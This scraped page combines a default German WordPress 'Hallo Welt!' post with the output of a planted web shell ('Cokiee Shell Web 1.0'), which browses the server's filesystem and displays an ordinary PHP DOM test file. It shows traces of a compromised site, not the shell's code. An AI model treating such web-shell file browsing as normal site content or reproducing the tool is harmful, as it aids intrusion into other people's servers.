Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /proc/self/root/usr/local/src/php72/php-7.2.12/php-7.2.12/ext/dom/tests/ |
Current File : //proc/self/root/usr/local/src/php72/php-7.2.12/php-7.2.12/ext/dom/tests/DOMNamedNodeMap_count.phpt |
--TEST-- Test count nodes in DOMNamedNodeMap --CREDITS-- Andreas Treichel <gmblar+github@gmail.com> --SKIPIF-- <?php require_once('skipif.inc'); ?> --FILE-- <?php $document = new DomDocument(); $root = $document->createElement('root'); $document->appendChild($root); for($i = 0; $i < 5; $i++) { $root->setAttribute('attribute-' . $i, 'value-' . $i); } for($i = 0; $i < 7; $i++) { $item = $document->createElement('item'); $root->appendChild($item); } var_dump($root->attributes->length); var_dump($root->attributes->count()); var_dump(count($root->attributes)); ?> --EXPECTF-- int(5) int(5) int(5)
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare